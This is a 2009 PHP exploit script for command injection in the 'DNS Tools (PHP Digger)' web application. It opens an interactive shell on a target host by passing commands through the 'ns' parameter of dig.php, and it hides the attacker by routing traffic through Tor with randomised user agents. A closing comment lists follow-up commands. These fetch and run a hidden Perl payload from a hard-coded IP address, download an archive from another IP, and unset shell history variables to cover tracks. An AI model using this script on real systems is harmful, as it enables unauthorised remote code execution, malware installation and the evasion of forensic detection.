dnstoolspd-exec.txt
Posted on 18 April 2009
<?php /* * DNS Tools (PHP Digger) Remote Command Execution (Interactive Shell) * * Author: Ricardo Almeida * email: ricardojba[at]aeiou[DoT]pt * * Credits: www.mortal-team.org * */ function wrap($url){ $ua = array('Mozilla','Opera','Microsoft Internet Explorer','ia_archiver','Chrome'); $op = array('Windows','Windows XP','Linux','Windows NT','Windows 2000','OSX','Windows 7','Windows Vista'); $agent = $ua[rand(0,3)].'/'.rand(1,8).'.'.rand(0,9).' ('.$op[rand(0,5)].' '.rand(1,7).'.'.rand(0,9).'; en-US;)'; # tor or other proxy $tor = '127.0.0.1:8118'; $timeout = '300'; $ack = curl_init(); curl_setopt ($ack, CURLOPT_PROXY, $tor); curl_setopt ($ack, CURLOPT_URL, $url); curl_setopt ($ack, CURLOPT_HEADER, 1); curl_setopt ($ack, CURLOPT_USERAGENT, $agent); curl_setopt ($ack, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ack, CURLOPT_FOLLOWLOCATION, 1); curl_setopt ($ack, CURLOPT_TIMEOUT, $timeout); $syn = curl_exec($ack); $info = curl_getinfo($ack); curl_close($ack); if($info['http_code'] == '200') { return $syn; die(); } else { return "Fail! :".$info['http_code']." "; } } if ($argc != 2) {die("Usage: dnstools.php <host> ");} array_shift($argv); $host = $argv[0]; # Start the interactive shell while(1){ fwrite(STDOUT, "[shell:~ # "); $cmd = trim(fgets(STDIN)); if ($cmd == "exit"){die();} else { $attackurl = "http://".$host."/dig.php?ns=||".$cmd."||&host=mortal-team.net&query_type=NS&status=digging"; echo wrap($attackurl); } } /* opencrest.com/scripts/dnstools www.taraservices.net/DNS_Tools cd /var/tmp;wget -P/var/tmp http://195.23.32.146/fotos/docs/.log.pl;chmod +x .log.pl;./.log.pl cd /var/tmp;./.log.pl cd /var/tmp;wget http://88.157.89.41:81/htdocs.zip unset HISTSAVE unset HISTFILE unset HISTFILESIZE unset HISTORY unset HISTSIZE unset HISTZONE */ ?>
